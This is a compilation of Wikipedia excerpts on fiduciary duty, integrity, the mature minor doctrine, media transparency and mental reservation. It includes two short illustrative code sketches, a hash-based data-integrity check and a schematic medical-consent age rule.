This situation represents a conflict of interest and duty. Both X and Y hold fiduciary duties to each other, which means they must subdue their own interests in favor of the duo's collective interest. By signing an individual contract and taking all the money, X has put personal interest above the fiduciary duty. Therefore, a court will find that X has breached his fiduciary duty. The judicial remedy here will be that X holds both the contract and the money in a constructive trust for the duo. Note that X will not be punished or totally denied the benefit; both X and Y will receive a half share in the contract and the money.

When T. Boone Pickens's Mesa Petroleum attempted to take over Cities Service in 1982, Cities Service attempted to take over the smaller Mesa instead.
Pickens was friends with Alan Habacht of Weiss, Peck & Greer, who supported Mesa's attempt. Fiduciary duty, however, required Habacht to seek the maximum possible return on the investment he managed by offering Weiss's Mesa shares to Cities Service's tender offer.[74]

A fiduciary, such as the administrator, executor or guardian of an estate, may be legally required to file with a probate court or judge a surety bond, called a fiduciary bond or probate bond, to guarantee faithful performance of his duties.[75] One of those duties may be to prepare, generally under oath, an inventory of the tangible or intangible property of the estate, describing the items or classes of property and usually placing a valuation on them.[76]

A bank or other fiduciary having legal title to a mortgage may sell fractional shares to investors, thereby creating a participating mortgage.

A fiduciary will be liable to account if proven to have acquired a profit, benefit or gain from the relationship by one of three means.[1] Therefore, it is said the fiduciary has a duty not to be in a situation where personal interests and fiduciary duty conflict, a duty not to be in a situation where his fiduciary duty conflicts with another fiduciary duty, and a duty not to profit from his fiduciary position without express knowledge and consent. A fiduciary cannot have a conflict of interest.

The state of Texas in the United States sets out the duties of a fiduciary in its Estates Code, chapter 751 (bracketed references to TPC refer to the Texas Probate Code, superseded by the Estates Code effective January 1, 2014).

A fiduciary's duty must not conflict with another fiduciary duty.[20][38][77] Conflicts between one fiduciary duty and another arise most often when a lawyer or an agent, such as a real estate agent, represents more than one client and the interests of those clients conflict.[23] This would occur, for example, when a lawyer attempts to represent both the plaintiff and the defendant in the same matter. The rule comes from the logical conclusion that a fiduciary cannot make the principal's interests a top priority if he has two principals and their interests are diametrically opposed; he must balance the interests, which is not acceptable to equity. Therefore, the conflict of duty and duty rule is really an extension of the conflict of interest and duty rules.

A fiduciary must not profit from the fiduciary position.[6][24][38][2] This includes any benefits or profits which, although unrelated to the fiduciary position, came about because of an opportunity that the fiduciary position afforded.[38][78] It is unnecessary that the principal would have been unable to make the profit; if the fiduciary makes a profit by virtue of his role as fiduciary for the principal, then the fiduciary must report the profit to the principal. If the principal provides fully informed consent, then the fiduciary may keep the benefit and be absolved of any liability for what would otherwise be a breach of fiduciary duty.[13][22][34] If this requirement is not met, then the property is deemed by the court to be held by the fiduciary on constructive trust for the principal.[20]

Secret commissions, or bribes, also come under the no-profit rule.[79] The bribe is held in constructive trust for the principal. The person who paid the bribe cannot recover it, since he has committed a crime. Similarly, the fiduciary who received the bribe has committed a crime.
Fiduciary duties are an aspect of equity and, in accordance with the equitable principles, or maxims, equity serves those with clean hands. Therefore, the bribe is held on constructive trust for the principal, the only innocent party.

Bribes were initially considered not to be held on constructive trust, but were considered to be held as a debt owed by the fiduciary to the principal.[80] This approach has been overruled; the bribe is now classified as held on constructive trust.[81] The change is due to pragmatic reasons, especially in regard to a bankrupt fiduciary. If a fiduciary takes a bribe and that bribe is considered a debt, then if the fiduciary goes bankrupt the debt will be left in his pool of assets to be paid to creditors, and the principal may miss out on recovery because other creditors were more secured. If the bribe is treated as held on constructive trust, then it will remain in the possession of the fiduciary, despite bankruptcy, until such time as the principal recovers it.

The landmark Australian decision ASIC v Citigroup noted that "informed consent" on behalf of the beneficiary to breaches of either the no-profit or the no-conflict rule will allow the fiduciary to get around these rules.[13][58] Furthermore, it highlighted that a contract may include a clause that allows individuals to avoid all fiduciary obligations within the course of dealings, and thereby continue to make a personal profit or deal with other parties, tasks that may otherwise have been in conflict with what would have been a fiduciary duty had it not been for this clause.[13] In the Australian case of Farah Constructions Pty Ltd v Say-Dee Pty Ltd, however, Gleeson CJ, Gummow, Callinan, Heydon and Crennan JJ observed that the sufficiency of disclosure may depend on the sophistication and intelligence of the persons to whom the disclosure must be made.[58]

However, in the English case of Armitage v Nurse an exception was noted to the fiduciary's obligation of good faith:[82] liability for breach of fiduciary duty by way of fraud or dishonesty cannot be avoided through an exclusion clause in a contract. The decision in Armitage v Nurse has been applied in Australian law.[83]

Conduct by a fiduciary may be deemed constructive fraud when it is based on acts, omissions or concealments considered fraudulent and that give one party an advantage over the other, because such conduct—though not actually fraudulent, dishonest or deceitful—demands redress for reasons of public policy.[84] Breach of fiduciary duty may occur in insider trading, when an insider or a related party makes trades in a corporation's securities based on material non-public information obtained during the performance of the insider's duties at the corporation. Breach of fiduciary duty by a lawyer with regard to a client, if negligent, may be a form of legal malpractice; if intentional, it may be remedied in equity.[85][86]

Where a principal can establish both a fiduciary duty and a breach of that duty through violation of the above rules, the court will find that the benefit gained by the fiduciary should be returned to the principal, because it would be unconscionable to allow the fiduciary to retain the benefit by employing his strict common law legal rights. This will be the case unless the fiduciary can show there was full disclosure of the conflict of interest or profit and that the principal fully accepted and freely consented to the fiduciary's course of action.[58]

Remedies will differ according to the type of damage or benefit.
They are usually distinguished between proprietary remedies, dealing with property, and personal remedies, dealing with pecuniary (monetary) compensation. Where concurrent contractual and fiduciary relationships exist, the remedies available to the plaintiff beneficiary depend upon the duty of care owed by the defendant and the specific breach of duty allowing for remedy/damages. The courts will clearly distinguish the relationship and determine the nature in which the breach occurred.[87]

Where the unconscionable gain by the fiduciary is in an easily identifiable form, such as the recording contract discussed above, the usual remedy will be the constructive trust already discussed.[88] Constructive trusts arise in many aspects of equity, not just in a remedial sense,[89] but, in this sense, what is meant by a constructive trust is that the court has created and imposed a duty on the fiduciary to hold the money in safekeeping until it can be rightfully transferred to the principal.[38][90]

An account of profits is another potential remedy.[91] It is usually used where the breach of duty was ongoing or when the gain is hard to identify. The idea of an account of profits is that the fiduciary profited unconscionably by virtue of the fiduciary position, so any profit made should be transferred to the principal. It may sound like a constructive trust at first, but it is not. An account of profits is the appropriate remedy when, for example, a senior employee has taken advantage of his fiduciary position by conducting his own company on the side and has accumulated substantial profits over a period of time, profits which he would not otherwise have been able to make. The fiduciary in breach may, however, receive an allowance for effort and ingenuity expended in making the profit.

Compensatory damages are also available.[92] Accounts of profits can be hard remedies to establish; therefore, a plaintiff will often seek compensation (damages) instead. Courts of equity initially had no power to award compensatory damages, which traditionally were a remedy at common law, but legislation and case law have changed the situation, so that compensatory damages may now be awarded for a purely equitable action.

Some experts have argued that, in the context of pension governance, trustees have started to reassert their fiduciary prerogatives more strongly after 2008 – notably following the heavy losses or reduced returns incurred by many retirement schemes in the wake of the Great Recession and the progression of ESG and Responsible Investment ideas: "Clearly, there is a mounting demand for CEOs (equity issuers) and governments (sovereign bond issuers) to be more 'accountable' ...
No longer ‘absentee landlords', trustees have started to exercise more forcefully their governance prerogatives across the boardrooms of Britain, Benelux and America: coming together through the establishment of engaged pressure groups."[93] However, in the United States, there are questions whether a pension fund's decision to consider factors such as how investments impact contributors' continued employment violates a fiduciary duty to maximize the retirement fund's returns.[94]

Pension funds and other large institutional investors are increasingly making their voices heard to call out irresponsible practices in the businesses in which they invest.[95]

The Fiduciary Duty in the 21st Century Programme, led by the United Nations Environment Programme Finance Initiative, the Principles for Responsible Investment, and the Generation Foundation, aims to end the debate on whether fiduciary duty is a legitimate barrier to the integration of environmental, social and governance (ESG) issues in investment practice and decision-making.[96] This followed the 2015 publication of "Fiduciary Duty in the 21st Century", which concluded that "failing to consider all long-term investment value drivers, including ESG issues, is a failure of fiduciary duty".[97] Founded on the realization that there is a general lack of legal clarity globally about the relationship between sustainability and investors' fiduciary duty, the programme engaged with and interviewed over 400 policymakers and investors to raise awareness of the importance of ESG issues to the fiduciary duties of investors. The programme also published roadmaps which set out recommendations to fully embed the consideration of ESG factors in the fiduciary duties of investors across more than eight capital markets.[96] Drawing upon findings from Fiduciary Duty in the 21st Century, the European Commission High-Level Expert Group (HLEG) recommended in its 2018 final report that the EU Commission clarify investor duties to better embrace long-term horizons and sustainability preferences.[98]
https://en.wikipedia.org/wiki/Fiduciary
Integrity is the quality of being honest and having a consistent and uncompromising adherence to strong moral and ethical principles and values.[1][2] In ethics, integrity is regarded as the honesty and truthfulness or earnestness of one's actions. Integrity can stand in opposition to hypocrisy.[3] It regards internal consistency as a virtue, and suggests that people who hold apparently conflicting values should account for the discrepancy or alter those values.

The word integrity evolved from the Latin adjective integer, meaning whole or complete.[1] In this context, integrity is the inner sense of "wholeness" deriving from qualities such as honesty and consistency of character.[4]

In ethics, a person is said to possess the virtue of integrity if the person's actions are based upon an internally consistent framework of principles.[5] These principles should uniformly adhere to sound logical axioms or postulates. A person has ethical integrity to the extent that the person's actions, beliefs, methods, measures, and principles align with a well-integrated core group of values. A person must, therefore, be flexible and willing to adjust these values to maintain consistency when these values are challenged—such as when observed results are incongruous with expected outcomes. Because such flexibility is a form of accountability, it is regarded as a moral responsibility as well as a virtue.

A person's value system provides a framework within which the person acts in ways that are consistent and expected. Integrity can be seen as the state of having such a framework and acting congruently within it.

One essential aspect of a consistent framework is its avoidance of any unwarranted (arbitrary) exceptions for a particular person or group—especially the person or group that holds the framework. In law, this principle of universal application requires that even those in positions of official power can be subjected to the same laws as pertain to their fellow citizens. In personal ethics, this principle requires that one should not act according to any rule that one would not wish to see universally followed. For example, one should not steal unless one would want to live in a world in which everyone was a thief. The philosopher Immanuel Kant formally described the principle of universality of application for one's motives in his categorical imperative.

The concept of integrity implies a wholeness—a comprehensive corpus of beliefs often referred to as a worldview. This concept of wholeness emphasizes honesty and authenticity, requiring that one act at all times in accordance with one's worldview.

Ethical integrity is not synonymous with the good, as Zuckert and Zuckert show about Ted Bundy: When caught, he defended his actions in terms of the fact-value distinction. He scoffed at those, like the professors from whom he learned the fact-value distinction, who still lived their lives as if there were truth-value to value claims. He thought they were fools and that he was one of the few who had the courage and integrity to live a consistent life in light of the truth that value judgments, including the command "Thou shalt not kill," are merely subjective assertions.

Politicians are given power to make, execute, or control policy, which can have important consequences. They typically promise to exercise this power in a way that serves society, but may not do so, which opposes the notion of integrity.
Aristotle said that because rulers have power they will be tempted to use it for personal gain.[7] In the book The Servant of the People, Muel Kaptein says integrity should start with politicians knowing what their position entails, because the consistency required by integrity applies also to the consequences of one's position. Integrity also demands knowledge of and compliance with both the letter and the spirit of the written and unwritten rules. Integrity is also acting consistently not only with what is generally accepted as moral, what others think, but primarily with what is ethical, what politicians should do based on reasonable arguments.[8]

Important virtues of politicians are faithfulness, humility,[8] and accountability. Furthermore, they should be authentic and a role model. Aristotle identified dignity (megalopsychia, variously translated as proper pride, greatness of soul, and magnanimity)[9] as the crown of the virtues, distinguishing it from vanity, temperance, and humility.

"Integrity tests" or (more confrontationally) "honesty tests"[10] aim to identify prospective employees who may hide perceived negative or derogatory aspects of their past, such as a criminal conviction or drug abuse. Identifying unsuitable candidates can save the employer from problems that might otherwise arise during their term of employment. Integrity tests make certain assumptions.[11] The claim that such tests can detect "fake" answers plays a crucial role in detecting people who have low integrity. Naive respondents really believe this pretense and behave accordingly, reporting some of their past deviance and their thoughts about the deviance of others, fearing that if they do not answer truthfully their untrue answers will reveal their "low integrity". These respondents believe that the more candid they are in their answers, the higher their "integrity score" will be.[12]

Disciplines and fields with an interest in integrity include philosophy of action, philosophy of medicine, mathematics, the mind, cognition, consciousness, materials science, structural engineering, and politics. Popular psychology identifies personal integrity, professional integrity, artistic integrity, and intellectual integrity. For example, to behave with scientific integrity, a scientific investigation should not determine the outcome in advance of the actual results. As an example of a breach of this principle, Public Health England, a UK government agency, stated that it upheld a line of government policy in advance of the outcome of a study that it had commissioned.[13]

The concept of integrity may also feature in business contexts that go beyond the issues of employee/employer honesty and ethical behavior, notably in marketing or branding contexts. Brand "integrity" gives a company's brand a consistent, unambiguous position in the mind of its audience. This is established, for example, via consistent messaging and a set of graphics standards to maintain visual integrity in marketing communications. Kaptein and Wempe developed a theory of corporate integrity that includes criteria for businesses dealing with moral dilemmas.[14]

Another use of the term "integrity" appears in Michael Jensen's and Werner Erhard's paper, "Integrity: A Positive Model that Incorporates the Normative Phenomenon of Morality, Ethics, and Legality". The authors model integrity as the state of being whole and complete, unbroken, unimpaired, sound, and in perfect condition.
They posit a model of integrity that provides access to increased performance for individuals, groups, organizations, and societies. Their model "reveals the causal link between integrity and increased performance, quality of life, and value-creation for all entities, and provides access to that causal link."[15]

According to Muel Kaptein, integrity is not a one-dimensional concept. In his book he presents a multifaceted perspective of integrity. Integrity relates, for example, to compliance with the rules as well as with social expectations, to morality as well as ethics, and to actions as well as attitude.[8]

Electronic signals are said to have integrity when there is no corruption of information between one domain and another, such as from a disk drive to a computer display. Such integrity is a fundamental principle of information assurance. Corrupted information is untrustworthy; uncorrupted information is of value.
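This notion of information integrity is routinely checked in software by comparing cryptographic digests of the data before and after it crosses a domain boundary. The following is a minimal sketch in Python, using the standard hashlib library; the function names sha256_digest and has_integrity are illustrative inventions, not drawn from any source cited above.

    import hashlib

    def sha256_digest(data: bytes) -> str:
        # The hex digest acts as a compact fingerprint of the data.
        return hashlib.sha256(data).hexdigest()

    def has_integrity(original: bytes, received: bytes) -> bool:
        # The received copy "has integrity" if it hashes to the
        # same fingerprint as the data that was originally sent.
        return sha256_digest(original) == sha256_digest(received)

    sent = b"uncorrupted information is of value"
    print(has_integrity(sent, sent))                                  # True
    print(has_integrity(sent, b"corrupted informatiom is of value"))  # False

A mismatch marks the received copy as untrustworthy in exactly the sense used above: the information changed somewhere between the two domains.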
https://en.wikipedia.org/wiki/Integrity
The mature minor doctrine is a rule of law found in the United States and Canada accepting that an unemancipated minor patient may possess the maturity to choose or reject a particular health care treatment, sometimes without the knowledge or agreement of parents, and should be permitted to do so.[1] It is now generally considered a form of patients' rights; formerly, the mature minor rule was largely seen as protecting health care providers from criminal and civil claims by parents of minors at least 15 years old.[2]

Jurisdictions may codify an age of medical consent, accept the judgment of licensed providers regarding an individual minor, or accept a formal court decision following a request that a patient be designated a mature minor, or may rely on some combination. For example, patients at least 16 may be assumed to be mature minors for this purpose,[3] patients aged 13 to 15 may be designated so by licensed providers, and pre-teen patients may be so designated after evaluation by an agency or court (this tiered structure is sketched schematically below). The mature minor doctrine is sometimes connected with enforcing confidentiality of minor patients from their parents.[4] In the United States, a typical statute lists: "Who may consent [or withhold consent for] surgical or medical treatment or procedures."

By definition, a "mature minor" has been found to have the capacity for decisional autonomy, or the right to make decisions, including whether to undergo risky but potentially life-saving medical treatment, alone and without parental approval.[7] By contrast, "medical emancipation" formally releases children from some parental involvement requirements but does not necessarily grant that decision-making to children themselves. Pursuant to statute, several jurisdictions grant medical emancipation to a minor who has become pregnant or requires sexual-health services, thereby permitting medical treatment without parental consent and, often, confidentiality from parents. A limited guardianship may be appointed to make medical decisions for the medically emancipated minor, and the minor may not be permitted to refuse or even choose treatment.[8]

One significant early U.S. case, Smith v. Seibly, 72 Wn.2d 16, 431 P.2d 719 (1967), before the Washington Supreme Court, establishes precedent on the mature minor doctrine. The plaintiff, Albert G. Smith, an 18-year-old married father, was suffering from myasthenia gravis, a progressive disease. Because of this, Smith expressed concern that his wife might become burdened in caring for him, for their existing child, and possibly for additional children. On March 9, 1961, while still 18, Smith requested a vasectomy. His doctor required written consent, which Smith provided, and the surgery was performed. Later, after reaching Washington's statutory age of majority, then 21, Smith sued the doctor, claiming that he had been a minor and thus unable to grant surgical or medical consent. The Court rejected Smith's argument: "Thus, age, intelligence, maturity, training, experience, economic independence or lack thereof, general conduct as an adult and freedom from the control of parents are all factors to be considered in such a case [involving consent to surgery]." The court further quoted another recently decided case, Grannum v. Berard, 70 Wn.2d 304, 307, 422 P.2d 812 (1967): "The mental capacity necessary to consent to a surgical operation is a question of fact to be determined from the circumstances of each individual case." The court explicitly stated that a minor may grant surgical consent even without formal emancipation.
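As a purely schematic illustration, the tiered structure mentioned above (statutory presumption, provider designation, agency or court evaluation) can be expressed as a simple decision rule. This is a hypothetical sketch only: the age thresholds are the article's example figures, not any particular jurisdiction's law, and the names ConsentBasis and consent_basis are invented for illustration.

    from enum import Enum

    class ConsentBasis(Enum):
        STATUTORY = "assumed mature by statute"
        PROVIDER = "may be designated mature by a licensed provider"
        COURT = "requires evaluation by an agency or court"

    def consent_basis(age: int) -> ConsentBasis:
        # Example thresholds from the article: at least 16 assumed mature;
        # 13 to 15 via provider designation; younger patients via a court.
        if age >= 16:
            return ConsentBasis.STATUTORY
        if age >= 13:
            return ConsentBasis.PROVIDER
        return ConsentBasis.COURT

    print(consent_basis(17).value)  # assumed mature by statute
    print(consent_basis(14).value)  # may be designated mature by a licensed provider
    print(consent_basis(11).value)  # requires evaluation by an agency or court

In practice, as the surrounding text makes clear, actual determinations turn on case-by-case findings of maturity rather than on age alone.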
Especially since the 1970s, older pediatric patients have sought to make autonomous decisions regarding their own treatment, and have sometimes sued successfully to do so.[9] Decades of accumulated evidence tended to demonstrate that children are capable of participating in medical decision-making in a meaningful way,[10][11] and the legal and medical communities have demonstrated an increasing willingness to formally affirm decisions made by young people, even regarding life and death.[12]

Religious beliefs have repeatedly influenced patients' decisions to choose treatment or not. In a 1989 case in Illinois, a 17-year-old female Jehovah's Witness was permitted to refuse necessary life-saving treatment.[13]

In 1990, the United States Congress passed the Patient Self-Determination Act; even though key provisions apply only to patients over age 18,[14] the legislation advanced patient involvement in decision-making. The West Virginia Supreme Court, in Belcher v. Charleston Area Medical Center (1992), defined a "mature minor" exception to parental consent, according consideration to seven factors to be weighed regarding such a minor: age, ability, experience, education, exhibited judgment, conduct, and appreciation of relevant risks and consequences.[15][16]

The 2000s and 2010s experienced a number of outbreaks of vaccine-preventable diseases, such as the 2019–2020 measles outbreaks, which were fueled in part by vaccine hesitancy. This prompted minors to seek vaccinations over objections from their parents.[17][18] Beginning in the 2020s, during the COVID-19 pandemic, minors also began seeking out the COVID-19 vaccine over the objections of their vaccine-hesitant parents.[19] This has led to proposals and bills allowing minors to consent to be administered any approved vaccine.[20]

The Supreme Court of Canada recognized the mature minor doctrine in 2009 in A.C. v. Manitoba [2009] SCC 30; in provinces and territories lacking relevant statutes, common law is presumed to apply.[21]

Several states permit minors to legally consent to general medical treatment (routine, nonemergency care, especially when the risk of treatment is considered to be low) without parental consent or over parental objections, when the minor is at least 14 years old.[25] In addition, many other states allow minors to consent to medical procedures under a more limited set of circumstances. These include providing limited minor autonomy only in enumerated cases, such as blood donation, substance abuse, sexual and reproductive health (including abortion and sexually transmitted infections), or for emergency medical services. Many states also exempt specific groups of minors from parental consent, such as homeless youth, emancipated minors, minor parents, or married minors.[26] Further complicating matters is the interaction between state tort law, state contract law, and federal law, depending on whether the clinic accepts federal funding under Title X or Medicaid.[26]

In the United States, bodily integrity has long been considered a common law right. The Supreme Court in 1990 (Cruzan v. Director, Missouri Department of Health) allowed that a "constitutionally protected liberty interest in refusing unwanted medical treatment may be inferred" from the Due Process Clause of the Fourteenth Amendment to the United States Constitution, but the Court refrained from explicitly establishing what would have been a newly enumerated right.
Nevertheless, lower courts have increasingly held that competent patients have the right to refuse any treatment for themselves.[31]

In 1989, the Supreme Court of Illinois interpreted the Supreme Court of the United States as having already adopted major aspects of the mature minor doctrine. In 2016, the case of In re Z.M. was heard in Maryland regarding a minor's right to refuse chemotherapy.[33] In Connecticut, Cassandra C., a seventeen-year-old, was ordered by the Connecticut Supreme Court to receive treatment; the court decided that Cassandra was not mature enough to make medical decisions.[34][13]

In 2009, the Supreme Court of Canada, ruling in A.C. v. Manitoba [2009] SCC 30 (CanLII), found that children may make life-and-death decisions about their medical treatment. The majority opinion was written by Justice Rosalie Abella. A "dissenting"[35] opinion by Justice Ian Binnie would have gone further. Analysts note that the Canadian decision merely requires that younger patients be permitted a hearing, and still allows a judge to "decide whether or not to order a medical procedure on an unwilling minor".[37]
https://en.wikipedia.org/wiki/Mature_minor_doctrine
Media transparency, also referred to as transparent media or media opacity,[1] is a concept that explores how and why information subsidies are produced, distributed and handled by media professionals, including journalists, editors, public relations practitioners, government officials, public affairs specialists, and spokespeople. In short, media transparency reflects the relationship between civilization and journalists, news sources and government. According to a textual analysis of "Information Subsidies and Agenda Building: A Study of Local Radio News", an information subsidy is defined as "any item provided to the media in order to gain time or space".[2] Media transparency deals with the openness and accountability of the media and can be defined as a transparent exchange of information subsidies based on the ideas of newsworthiness.[3] Media transparency is one of the biggest challenges of contemporary everyday media practices around the world, as media outlets and journalists constantly experience pressures from advertisers, information sources, publishers, and other influential groups.[4]

News sources may influence what information is published or not published. Sometimes, published information can also be paid for by news sources, but the end media product (an article, a program, a blog post) does not clearly indicate that the message has been paid for or influenced in any way. Such media opacity, or media non-transparency, ruins the trust and transparency between the media and the public, and has implications for the transparency of new forms of advertising and public relations (such as native advertising and brand journalism).[5] Media transparency is defined to be a normative concept.

An important notion concerning media transparency is the use of ICTs, which can be defined as "Information and Communication Technology".[6] ICTs are the online means of communication discussed in the following sections. Transparency using the Internet has been a large fascination of social scientists, and the research surrounding transparency continues to grow. The basis for understanding transparency and technology is emphasized by Yoni Van Den Eede to be the work of Martin Heidegger and Marshall McLuhan. Eede claims, "In recent years several approaches – philosophical, sociological, psychological – have been developed to come to grips with our profoundly technologically mediated world"[7] (Eede, 2011), yet continues to explain that these recent discoveries would not have been made without the work first accomplished concerning media and technology by Heidegger and McLuhan.

Martin Heidegger began these studies without using the word transparency, but its relevance is clear within his "tool analysis".[7] The tool analysis argues that one is never aware of the tools one uses in everyday life until they no longer function as they should, or, as Eede concludes, "the tool is 'transparent' in the sense that we don't notice it 'as-tool'".[7] The tool in this context is media, and, as the study argues, we do not notice media and the presence it holds in our lives. Eede expands on the tool analysis, stating that there are two ways in which humans use tools: readiness-to-hand and presence-at-hand.[7] This separation of readiness and presence is explained further by G. Harman, who argues that Heidegger's theory can be understood through what we consciously view as helpful versus what is unconsciously helping us (humankind).
Harman claims, "If I observe a table and try to describe its appearance, I silently rely on a vast armada of invisible things that recede into a tacit background. The table that hovers visibly before my mind is outnumbered by all the invisible items that sustain my current reality: floor, oxygen, air conditioning, bodily organs"[8] (Harman, 2010). Through this 'table' analogy, one can conclude that the table in this sense is technology, and that its use to create transparency and understanding within society, concerning the social and economic doings of government and the greater powers that govern each nation and entity, is the vast background that goes overlooked,[8] just as the surroundings of the table are. Through this understanding of theory, transparency can then be further explored for its major importance in shaping one's environment, consciously and unconsciously.

Another important theorist to consider when researching ICTs and transparency is Marshall McLuhan, who coined the term "the medium is the message".[7] McLuhan conducted his work in the 1960s, with the introduction of the global village and the age of technology use in communications. The concept of transparency is heavily explored within McLuhan's media theory, which examines the channels of medium in which media are presented (television, radio, etc.); these channels are defined to be the real messages of the media themselves, and emphasis is placed upon understanding the means of the medium rather than the content itself, as they "manifest themselves first and foremost in the way we perceive, process and interpret sense data"[7] (Eede, 2011). Through understanding the medium itself to be the message, and as the medium itself creates a greater understanding and a more transparent view of the world around us, one can conclude that McLuhan's work is essential to understanding why ICTs and a sense of transparency concerning day-to-day life, government work, and national and global affairs are of importance. McLuhan, to summarize, concluded that society must be more involved, and that its participants are actively looking to be more involved, as they navigate their social understanding and surroundings.[9]

Within the study conducted by the Government Information Quarterly, media transparency is understood through its ability to aid societies with openness and anti-corruption. This unbiased approach to understanding media transparency specifically deals with how media transparency is an important aspect of social and economic development. The article cited explores the four main channels of transparency at the governmental level: proactive dissemination by the government; release of requested materials by the government; public meetings; and leaks from whistleblowers.[10] These four means of communication help to deter negative propaganda posed by governments and officials and work towards the complete transparency that is arguably necessary to create a thriving social and economic system. Propaganda stands as a threat to the accurate distribution and intake of information, and disrupts all that transparency works to accomplish. The following sections expand on further aspects of propaganda and on other ways in which transparency is disrupted.

Corruption and media bribery are large concepts of interest when considering the importance of media transparency. The concept of media bribery emerged in response to claims of bias within the media.
This lack of media transparency can be perceived as a form of corruption. Media transparency is a means to diminish unethical and illegal practices in the relationships between news sources and the media. A study published in the Government Information Quarterly states, "The focus on corruption as an economic issue has been part of an overall rise in global interest in transparency. Internationally, corruption has received great attention since 1990 due to fears of increasing opportunities for illicit activity due to globalization (Brown & Cloke, 2005)".[10] There are many areas of concern when it comes to bribery and corruption, specifically law enforcement and government regulation. Corruption of the media and barriers to transparency can take the form of propaganda and misinformation. These can be actively worked against through administrative reform, stricter oversight and regulation of law enforcement, and social change.[10]

Academics at the University of Oxford and Warwick Business School, conducting empirical research on the operation and effects of transparent forms of clinical regulation in practice, describe a form of 'spectacular transparency'. The social scientists suggest that government policy tends to react to high-profile media 'spectacles', leading to regulatory policy decisions that appear to respond to problems exposed in the media but have new, perverse effects in practice, which are unseen by regulators or the media.[11][12]

The degree to which state agents work to influence video production contradicts the use of those images by news organizations as indexical, objective representations. Because people tend to strongly equate seeing with knowing, video cultivates an inaccurate impression that they are getting the "full picture". It has been said that "what is on the news depends on what can be shown". The case studies for this project demonstrate that what can be shown is often decided in concert with political agents. Essentially, the way the media presents its information can create an illusion of transparency.[13]

The presentation of media is further explored for its interest in the human experience through the work of George Gerbner and his cultivation theory. As explained by analyst W. James Potter, Gerbner was "concerned with the influence that a much broader scope of messages gradually exerted on the public as people were exposed to media messages in their everyday lives"[14] (Potter, 2014). Gerbner questioned previous theorists' attempts to understand the media's power over civilization by means of television programs and direct intake. Gerbner asserted that in order to understand the impact of the media, research must be done concerning the environment in which people are living, studying the world as presented by medium channels.[14] Potter argues that "while Gerbner recognized that there were individual differences in interpretations of messages, cultivation was not concerned about those variations in interpretations; instead, cultivation focused on the dominant meanings that the media presented to the public" (Potter, 2014).
Through Gerbner's Cultural Indicators Research Project, power is explored through its presentation in the media, and Gerbner argues that to create a transparent environment in which cultural and social norms are unbiased, one must look to understand whether transparency is being upheld by media sources or whether it is being manipulated in order to control civilization and keep power.[15] The work of analyst John A. Lent uncovers Gerbner's understanding of power structure through the control of media and medium channels: "viewers came to consider the world as rightly belonging to the power and money elite depicted on television – young, white males, idealized as heroic doctors and other professionals. He warned that women, minorities and the elderly seeing these role models repeatedly were apt to accept their own inferior positions and opportunities as inevitable and deserved, which he said was an indictment of their civil rights" (Lent, 2006, p. 88). Power, then, can be understood as residing with those who control the media outlets and the level of transparency concerning world events, biased opinions, and representation conveyed to the citizens who live within the media-controlled environment. Power is not within the eye of the beholder, but within those who project to the greater population.

The creation of an electronic government and the use of the internet along with social media are new ways to get information concerning government work and services to citizens. The use of media in all electronic forms is argued to be an "influential factor in the restoration of trust in government because it has the potential to improve government performance and transparency" in a study published in the Public Performance and Management Review[16] (Song and Lee, 2016). The study continues to argue that many studies have reported that, through the information and transaction services available on government websites, citizens feel a sense of effectiveness, accessibility, responsiveness, and satisfaction,[16] all of which constitute an overall sense of trust in government. These information and transaction services are more specifically categorized as social media sites that connect citizens to their government. Song and Lee conclude that "social media can be defined as a group of Web 2.0 technologies that facilitate interactions between users [...] By their nature, social media afford easy access to information through convenient devices like cell phones and tablets, enable user-created content, and provide visible social connections"[16] (Song and Lee, 2016). From a citizen's perspective, transparency is attained through understanding the local government's actions and movements, along with creating open lines of communication, all of which can be done through social media and other means of online communication.[16] Song and Lee conclude, following their experiment concerning media use in relation to government, that "social media in government enable citizens to gain easier access to government and be more informed about current events, policies, or programs, heightening their perception of transparency in government"[16] (Song and Lee, 2016). This conclusion argues for a social media presence in governmental action in order to create transparency; media transparency is needed for a cohesive and close-knit society. The ability to cultivate trust is essential within the means of transparency and communication.
In the article published by Changsoo Song and Jooho Lee, the two explain trust through work compiled by social theorist J. S. Coleman, who seeks to explain trust in simple terms. The study states that "three essential elements" are used in explaining what leads a potential trustor (e.g., the citizen) to vest trust in a trustee (e.g., the government). Song and Lee then apply this framework to the governmental context and conclude that the role of information is necessary in trust-building: governments must perform or take action in their citizens' interest (and visibly show this action or performance via social media) in order to gain trust in and respect for their work.[16]
https://en.wikipedia.org/wiki/Media_transparency
Mental reservation (or mental equivocation) is an ethical theory and a doctrine in moral theology which recognizes the "lie of necessity" and holds that when there is a conflict between justice and telling the truth, it is justice that should prevail. The doctrine is a special branch of casuistry (case-based reasoning) developed in the late Middle Ages and the Renaissance. While associated with the Jesuits, it did not originate with them. It is a theory debated by moral theologians, but not part of canon law.

It was argued in moral theology, and now in ethics, that mental reservation was a way to fulfill obligations both to tell the truth and to keep secrets from those not entitled to know them (for example, because of the seal of the confessional or other clauses of confidentiality). Mental reservation, however, is regarded as unjustifiable without grave reason for withholding the truth. This condition was necessary to preserve a general idea of truth in social relations.

Social psychologists have advanced cases[1] where the actor is confronted with an avoidance-avoidance conflict, in which he both does not want to tell the truth and does not want to make an outright lie; in such circumstances, equivocal statements are generally preferred. This type of equivocation has been defined as "nonstraightforward communication ... ambiguous, contradictory, tangential, obscure or even evasive."[2] People typically equivocate when posed a question to which all of the possible replies have potentially negative consequences, yet a reply is still expected (the situational theory of communicative conflict).[3]

The Bible contains a good example of equivocation. Abraham was married to Sarah/Sarai, his half-sister by a different mother. Fearing that as he traveled people would covet his beautiful wife and as a result kill him to take her, he counselled her to agree with him when he would say that "she is my sister". This happened on two occasions, first with the Pharaoh of Egypt, told in Genesis 12:11-13, and second, with a king called Abimelech, in Genesis 20:12. Abraham later explained to Abimelech that Sarah was indeed his sister, as they shared the same father although they had different mothers. Writers Petrus Serrarius, Giovanni Stefano Menochio and George Leo Haydock also refer to mental reservation as justification for Judith's false explanation that she intended to betray her people to the Assyrians in the deuterocanonical book which bears her name.[4]

